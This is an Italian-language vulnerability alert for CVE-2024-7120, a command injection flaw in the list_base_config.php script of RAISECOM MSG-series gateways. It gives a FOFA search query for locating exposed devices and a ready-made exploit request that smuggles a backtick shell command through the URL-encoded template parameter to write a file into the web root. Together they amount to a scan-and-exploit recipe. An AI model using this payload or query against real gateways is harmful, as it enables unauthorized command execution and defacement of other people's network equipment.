
⚠️⚠️ CVE-2024-7120 Vulnerabilità di Iniezione di Comandi nei Dispositivi Gateway RAISECOM
È stata identificata una vulnerabilità di command injection nei dispositivi Gateway RAISECOM, che interessa i modelli MSG1200, MSG2100E, MSG2200 e MSG2300. Questa vulnerabilità consente a un attaccante remoto di eseguire comandi arbitrari sul sistema tramite l'interfaccia web. Il problema risiede nello script list_base_config.php, in particolare tramite il parametro template, e interessa oltre 25.112 dispositivi su Internet.
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

URI: /vpn/list_base_config.php
Descrizione: list_base_config.php è un componente dell'interfaccia web dei dispositivi Gateway RAISECOM utilizzato per la gestione delle configurazioni VPN. La vulnerabilità identificata deriva da una gestione impropria del parametro template in questo script. Questo parametro può essere sfruttato per eseguire comandi arbitrari sul sistema operativo del dispositivo a causa di una sanitizzazione insufficiente degli input.
CWE-77: Command Injection
Ecco un esempio di come la vulnerabilità può essere sfruttata usando un comando curl:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
In questo esempio, il comando curl invia una richiesta HTTP GET dannosa allo script list_base_config.php. La richiesta utilizza il parametro template per eseguire un comando.

